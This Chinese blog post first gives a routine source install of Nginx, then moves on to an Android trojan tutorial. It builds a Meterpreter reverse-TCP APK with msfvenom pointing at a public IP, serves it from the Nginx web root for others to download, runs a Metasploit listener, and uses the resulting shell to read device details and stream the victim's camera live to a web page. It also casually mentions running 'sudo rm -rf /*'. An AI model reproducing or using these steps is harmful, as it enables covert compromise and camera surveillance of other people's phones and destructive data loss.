Nginx("engine x")是一款是由俄罗斯的程序设计师Igor Sysoev所开发高性能的 Web和 反向代理 服务器,也是一个 IMAP/POP3/SMTP 代理服务器。

Nginx 的编写有一个明确目标就是超越 Apache Web 服务器的性能。Nginx 提供开箱即用的静态文件,使用的内存比 Apache 少得多,每秒可以处理大约四倍于 Apache 的请求。 在低并发下 Nginx 的性能与 Apache 相当(有时候还低于),但是在高并发下 Nginx 能保持低资源低消耗高性能。Nginx 的优点还包括:高度模块化的设计,模块编写简单,以及配置文件简洁。在高连接并发的情况下,Nginx是Apache服务器不错的替代品。

官网:http://nginx.org/en/download.html

yum install -y wget gcc-c++pcre pcre-develzlib zlib-developenssl openssl-devel

wget http://nginx.org/download/nginx-1.18.0.tar.gz

tar zxvf nginx-1.18.0.tar.gz && cd nginx-1.18.0

./configure --prefix=/usr/local/nginx

make && make install

cd /usr/local/nginx/sbin

./nginx

首页文件在 /usr/local/nginx/html 目录下
打开ip显示Welcome to nginx!就证明安装成功了

木马文件的进阶玩法

如果你只是想看怎么安装nginx的话,就不用往下看了,下面内容是跟上一篇木马文件的进阶玩法有关的

有人给我反馈了这两个问题

  • 生成的apk怎么给别人下载?
  • 手机木马开启实时摄像头时会生成一个html,从服务器下载到本地,打开没图片

后来我尝试着安装宝塔面板,发现启动侦听的时候shell没反弹回来。我在寻思着是不是宝塔占用了某些东西,后来我卸载了宝塔,然后尝试了好几个端口,shell都没反弹成功,重启也没用。我TM直接使用sudo rm -rf /* 好家伙,还是没用。最后我直接重装系统,真就验证那句话“重装解决99%问题”,最后只能安装nginx,折腾了大半天时间终于可以实时查看摄像头了

所以你的服务器一定不能是安装过宝塔的(当然你只要找到解决方法就行了,反正我不知道怎么解决),实在想玩的话先做个快照,然后重装系统

废话不多说,接着上一篇的进阶玩法,

现在已经安装了metasploit和nginx,然后cd进入

# cd进入nginx根目录
cd /usr/local/nginx/html

# 启动metasploit渗透框架
msfconsole

# 生成安卓木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=124.223.164.2 LPORT=6666 R > qyyx.apk

# 使用侦听模块
use exploit/multi/handler
 
# 加载payload攻击模块
set payload android/meterpreter/reverse_tcp
 
# 设置服务器的公网ip
set LHOST 124.223.164.2
 
# 设置端口
set LPORT 6666

# 启动监听
run

生成的apk在nginx根目录下直接访问124.223.164.2/qyyx.apk 就可以下载了
现在用手机下载这个apk安装打开测试一下

shell已经反弹成功了,执行一些命令试试
比如说获取手机信息,摄像头数量,开启实时摄像头
开启实时摄像头时会随机生成一个html

打开 ip + /生成的html就可以看到实时摄像头了,每刷新一下网页就会更新摄像头图片
124.223.164.2/VHoxasJU.html

届ける言葉を今は育ててる
最后更新于 2022-04-04
啥也没有呀